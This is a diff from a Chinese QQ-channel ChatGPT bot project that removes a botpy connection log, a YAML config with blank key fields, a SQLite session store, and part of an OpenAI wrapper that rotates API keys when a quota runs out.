2022-12-08 17:13:47,995 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 17:13:48,198 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 17:13:48,300 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 17:13:48,302 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 17:16:31,326 [ERROR] (http.py:73)_handle_response [botpy] 接口请求异常,请求连接: https://api.sgroup.qq.com/channels/7150658/messages, 错误代码: 501, 返回内容: None, trace_id:None
|
||||
2022-12-08 17:22:03,924 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 17:22:04,671 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 17:22:04,672 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 17:22:04,673 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 17:22:04,673 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 17:22:04,856 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 17:22:04,958 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 17:22:04,959 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 17:52:04,868 [INFO] (gateway.py:54)on_closed [botpy] 关闭, 返回码: 4009, 返回信息: Session timed out
|
||||
2022-12-08 17:52:09,874 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 17:52:09,876 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 17:52:09,877 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 17:52:10,104 [INFO] (gateway.py:169)ws_resume [botpy] 重连启动...
|
||||
2022-12-08 17:52:10,170 [INFO] (gateway.py:85)on_message [botpy] 机器人重连成功!
|
||||
2022-12-08 17:52:10,171 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 18:00:00,757 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 18:00:01,443 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 18:00:01,443 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 18:00:01,444 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 18:00:01,445 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 18:00:01,602 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 18:00:01,823 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 18:00:01,824 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 18:03:13,211 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 18:03:14,082 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 18:03:14,084 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 18:03:14,084 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 18:03:14,085 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 18:03:14,289 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 18:03:14,498 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 18:03:14,499 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 18:16:29,246 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 18:16:30,054 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 18:16:30,055 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 18:16:30,056 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 18:16:30,056 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 18:16:30,293 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 18:16:30,424 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 18:16:30,424 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 18:16:41,898 [ERROR] (http.py:73)_handle_response [botpy] 接口请求异常,请求连接: https://api.sgroup.qq.com/channels/7150658/messages, 错误代码: 403, 返回内容: {'code': 304003, 'message': 'url not allowed'}, trace_id:3cc9fc95ac27cbbc1f1667f1aa11bf8d
|
||||
2022-12-08 18:18:16,615 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 18:18:17,399 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 18:18:17,400 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 18:18:17,400 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 18:18:17,401 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 18:18:17,606 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 18:18:17,731 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 18:18:17,732 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 18:19:07,357 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 18:19:07,941 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 18:19:07,942 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 18:19:07,942 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 18:19:07,943 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 18:19:08,247 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 18:19:08,335 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 18:19:08,336 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 18:20:46,416 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 18:20:47,023 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 18:20:47,023 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 18:20:47,024 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 18:20:47,025 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 18:20:47,475 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 18:20:47,640 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 18:20:47,641 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 18:21:24,437 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 18:21:24,991 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 18:21:24,992 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 18:21:24,993 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 18:21:24,993 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 18:21:25,165 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 18:21:25,265 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 18:21:25,266 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 18:24:18,469 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 18:24:19,076 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 18:24:19,077 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 18:24:19,077 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 18:24:19,078 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 18:24:19,252 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 18:24:19,339 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 18:24:19,341 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 18:27:13,898 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 18:27:14,553 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 18:27:14,554 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 18:27:14,554 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 18:27:14,555 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 18:27:14,747 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 18:27:14,850 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 18:27:14,851 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 18:30:47,647 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 18:30:48,327 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 18:30:48,328 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 18:30:48,329 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 18:30:48,330 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 18:30:48,736 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 18:30:48,873 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 18:30:48,874 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 18:31:57,250 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 18:31:57,955 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 18:31:57,956 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 18:31:57,957 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 18:31:57,957 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 18:31:58,165 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 18:31:58,269 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 18:31:58,270 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 19:01:58,099 [INFO] (gateway.py:54)on_closed [botpy] 关闭, 返回码: 4009, 返回信息: Session timed out
|
||||
2022-12-08 19:02:03,110 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 19:02:03,111 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 19:02:03,111 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 19:02:03,314 [INFO] (gateway.py:169)ws_resume [botpy] 重连启动...
|
||||
2022-12-08 19:02:03,381 [INFO] (gateway.py:85)on_message [botpy] 机器人重连成功!
|
||||
2022-12-08 19:02:03,382 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 19:32:03,274 [INFO] (gateway.py:54)on_closed [botpy] 关闭, 返回码: 4009, 返回信息: Session timed out
|
||||
2022-12-08 19:32:08,271 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 19:32:08,272 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 19:32:08,272 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 19:32:08,534 [INFO] (gateway.py:169)ws_resume [botpy] 重连启动...
|
||||
2022-12-08 19:32:08,604 [INFO] (gateway.py:85)on_message [botpy] 机器人重连成功!
|
||||
2022-12-08 19:32:08,605 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 20:02:08,495 [INFO] (gateway.py:54)on_closed [botpy] 关闭, 返回码: 4009, 返回信息: Session timed out
|
||||
2022-12-08 20:02:13,497 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 20:02:13,497 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 20:02:13,498 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 20:02:13,797 [INFO] (gateway.py:169)ws_resume [botpy] 重连启动...
|
||||
2022-12-08 20:02:13,914 [INFO] (gateway.py:85)on_message [botpy] 机器人重连成功!
|
||||
2022-12-08 20:02:13,915 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 20:31:53,159 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 20:31:58,306 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 20:31:58,307 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 20:31:58,308 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 20:31:58,308 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 20:31:58,748 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 20:31:58,924 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 20:31:58,925 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 20:34:26,596 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 20:34:27,610 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 20:34:27,611 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 20:34:27,613 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 20:34:27,613 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 20:34:27,919 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 20:34:28,022 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 20:34:28,023 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 20:35:47,952 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 20:35:48,499 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 20:35:48,500 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 20:35:48,500 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 20:35:48,501 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 20:35:48,723 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 20:35:48,793 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 20:35:48,794 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 20:55:03,450 [ERROR] (http.py:73)_handle_response [botpy] 接口请求异常,请求连接: https://api.sgroup.qq.com/channels/7150658/messages, 错误代码: 403, 返回内容: {'code': 304003, 'message': 'url not allowed'}, trace_id:c4c4d23f9b2829d03ae9a7dca0184fe9
|
||||
2022-12-08 21:05:48,678 [INFO] (gateway.py:54)on_closed [botpy] 关闭, 返回码: 4009, 返回信息: Session timed out
|
||||
2022-12-08 21:05:53,700 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 21:05:53,701 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 21:05:53,702 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 21:05:54,145 [INFO] (gateway.py:169)ws_resume [botpy] 重连启动...
|
||||
2022-12-08 21:05:54,232 [INFO] (gateway.py:85)on_message [botpy] 机器人重连成功!
|
||||
2022-12-08 21:05:54,233 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 21:07:39,468 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 21:07:40,244 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 21:07:40,245 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 21:07:40,246 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 21:07:40,247 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 21:07:40,553 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 21:07:40,659 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 21:07:40,660 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 21:30:11,249 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 21:30:12,217 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 21:30:12,218 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 21:30:12,219 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 21:30:12,219 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 21:30:12,627 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 21:30:12,730 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 21:30:12,731 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 21:36:34,660 [ERROR] (http.py:73)_handle_response [botpy] 接口请求异常,请求连接: https://api.sgroup.qq.com/channels/7150658/messages, 错误代码: 501, 返回内容: None, trace_id:None
|
||||
2022-12-08 21:38:39,294 [ERROR] (http.py:73)_handle_response [botpy] 接口请求异常,请求连接: https://api.sgroup.qq.com/channels/7150658/messages, 错误代码: 501, 返回内容: None, trace_id:None
|
||||
2022-12-08 21:39:43,233 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 21:39:43,878 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 21:39:43,879 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 21:39:43,880 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 21:39:43,880 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 21:39:44,099 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 21:39:44,279 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 21:39:44,281 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 21:40:38,103 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 21:40:39,100 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 21:40:39,101 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 21:40:39,102 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 21:40:39,102 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 21:40:39,402 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 21:40:39,502 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 21:40:39,503 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 21:40:52,805 [ERROR] (http.py:73)_handle_response [botpy] 接口请求异常,请求连接: https://api.sgroup.qq.com/channels/7150658/messages, 错误代码: 501, 返回内容: None, trace_id:None
|
||||
2022-12-08 21:41:39,703 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 21:41:40,399 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 21:41:40,400 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 21:41:40,401 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 21:41:40,401 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 21:41:40,644 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 21:41:40,740 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 21:41:40,741 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 21:41:56,705 [ERROR] (http.py:73)_handle_response [botpy] 接口请求异常,请求连接: https://api.sgroup.qq.com/channels/7150658/messages, 错误代码: 501, 返回内容: None, trace_id:None
|
||||
2022-12-08 21:42:55,625 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 21:42:56,278 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 21:42:56,279 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 21:42:56,280 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 21:42:56,281 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 21:42:56,718 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 21:42:56,819 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 21:42:56,820 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 21:43:09,794 [ERROR] (http.py:73)_handle_response [botpy] 接口请求异常,请求连接: https://api.sgroup.qq.com/channels/7150658/messages, 错误代码: 501, 返回内容: None, trace_id:None
|
||||
@@ -1,29 +0,0 @@
|
||||
openai:
|
||||
# 注意:在1.7版本已支持多key自动切换,方法:
|
||||
# key:
|
||||
# - xxxxx
|
||||
# - xxxxxx
|
||||
# 在下方非注释的地方使用以上格式
|
||||
key:
|
||||
-
|
||||
chatGPTConfigs:
|
||||
engine: text-davinci-003
|
||||
max_tokens: 800
|
||||
temperature: 0.8
|
||||
top_p: 1
|
||||
frequency_penalty: 0.4
|
||||
presence_penalty: 0.3
|
||||
total_tokens_limit: 700
|
||||
|
||||
qqbot:
|
||||
appid:
|
||||
token:
|
||||
|
||||
# 设置是否一个人一个会话
|
||||
uniqueSessionMode: false
|
||||
|
||||
# QChannelBot 的版本
|
||||
version: 1.7 beta
|
||||
|
||||
# [Beta] 转储历史记录时间间隔(分钟)
|
||||
dump_history_interval: 10
|
||||
@@ -1,86 +0,0 @@
|
||||
import sqlite3
|
||||
import yaml
|
||||
|
||||
# TODO: 数据库缓存prompt
|
||||
|
||||
class dbConn():
|
||||
def __init__(self):
|
||||
# 读取参数,并支持中文
|
||||
conn = sqlite3.connect("data.db")
|
||||
conn.text_factory=str
|
||||
self.conn = conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
CREATE TABLE IF NOT EXISTS tb_session(
|
||||
qq_id VARCHAR(32) PRIMARY KEY,
|
||||
history TEXT
|
||||
)
|
||||
'''
|
||||
)
|
||||
|
||||
conn.commit()
|
||||
|
||||
def insert_session(self, qq_id, history):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
INSERT INTO tb_session(qq_id, history) VALUES (?, ?)
|
||||
''', (qq_id, history)
|
||||
)
|
||||
conn.commit()
|
||||
|
||||
def update_session(self, qq_id, history):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
UPDATE tb_session SET history = ? WHERE qq_id = ?
|
||||
''', (history, qq_id)
|
||||
)
|
||||
conn.commit()
|
||||
|
||||
def get_session(self, qq_id):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT * FROM tb_session WHERE qq_id = ?
|
||||
''', (qq_id, )
|
||||
)
|
||||
return c.fetchone()
|
||||
|
||||
def get_all_session(self):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT * FROM tb_session
|
||||
'''
|
||||
)
|
||||
return c.fetchall()
|
||||
|
||||
def check_session(self, qq_id):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT * FROM tb_session WHERE qq_id = ?
|
||||
''', (qq_id, )
|
||||
)
|
||||
return c.fetchone() is not None
|
||||
|
||||
def delete_session(self, qq_id):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
DELETE FROM tb_session WHERE qq_id = ?
|
||||
''', (qq_id, )
|
||||
)
|
||||
conn.commit()
|
||||
|
||||
def close(self):
|
||||
self.conn.close()
|
||||
|
||||
@@ -1,169 +0,0 @@
|
||||
import openai
|
||||
import yaml
|
||||
from util.errors.errors import PromptExceededError
|
||||
import json
|
||||
import time
|
||||
import os
|
||||
import sys
|
||||
|
||||
inst = None
|
||||
# 适配pyinstaller
|
||||
abs_path = os.path.dirname(os.path.realpath(sys.argv[0])) + '/'
|
||||
key_record_path = abs_path+'chatgpt_key_record'
|
||||
|
||||
class ChatGPT:
|
||||
def __init__(self):
|
||||
self.key_list = []
|
||||
with open(abs_path+"configs/config.yaml", 'r', encoding='utf-8') as ymlfile:
|
||||
cfg = yaml.safe_load(ymlfile)
|
||||
if cfg['openai']['key'] != '' or cfg['openai']['key'] != '修改我!!':
|
||||
print("读取ChatGPT Key成功")
|
||||
self.key_list = cfg['openai']['key']
|
||||
# openai.api_key = cfg['openai']['key']
|
||||
else:
|
||||
input("请先去完善ChatGPT的Key。详情请前往https://beta.openai.com/account/api-keys")
|
||||
|
||||
# init key record
|
||||
self.init_key_record()
|
||||
|
||||
chatGPT_configs = cfg['openai']['chatGPTConfigs']
|
||||
print(f'加载ChatGPTConfigs: {chatGPT_configs}')
|
||||
self.chatGPT_configs = chatGPT_configs
|
||||
self.openai_configs = cfg['openai']
|
||||
|
||||
def chat(self, prompt, image_mode = False):
|
||||
try:
|
||||
if not image_mode:
|
||||
response = openai.Completion.create(
|
||||
prompt=prompt,
|
||||
**self.chatGPT_configs
|
||||
)
|
||||
else:
|
||||
response = openai.Image.create(
|
||||
prompt=prompt,
|
||||
n=1,
|
||||
size="512x512",
|
||||
)
|
||||
except Exception as e:
|
||||
print(e)
|
||||
if 'You exceeded' in str(e) or 'Billing hard limit has been reached' in str(e) or 'No API key provided.' in str(e):
|
||||
print("当前Key已超额,正在切换")
|
||||
self.key_stat[openai.api_key]['exceed'] = True
|
||||
self.save_key_record()
|
||||
|
||||
response, is_switched = self.handle_switch_key(prompt)
|
||||
if not is_switched:
|
||||
# 所有Key都超额
|
||||
raise e
|
||||
else:
|
||||
if not image_mode:
|
||||
response = openai.Completion.create(
|
||||
prompt=prompt,
|
||||
**self.chatGPT_configs
|
||||
)
|
||||
else:
|
||||
response = openai.Image.create(
|
||||
prompt=prompt,
|
||||
n=1,
|
||||
size="512x512",
|
||||
)
|
||||
if not image_mode:
|
||||
self.key_stat[openai.api_key]['used'] += response['usage']['total_tokens']
|
||||
self.save_key_record()
|
||||
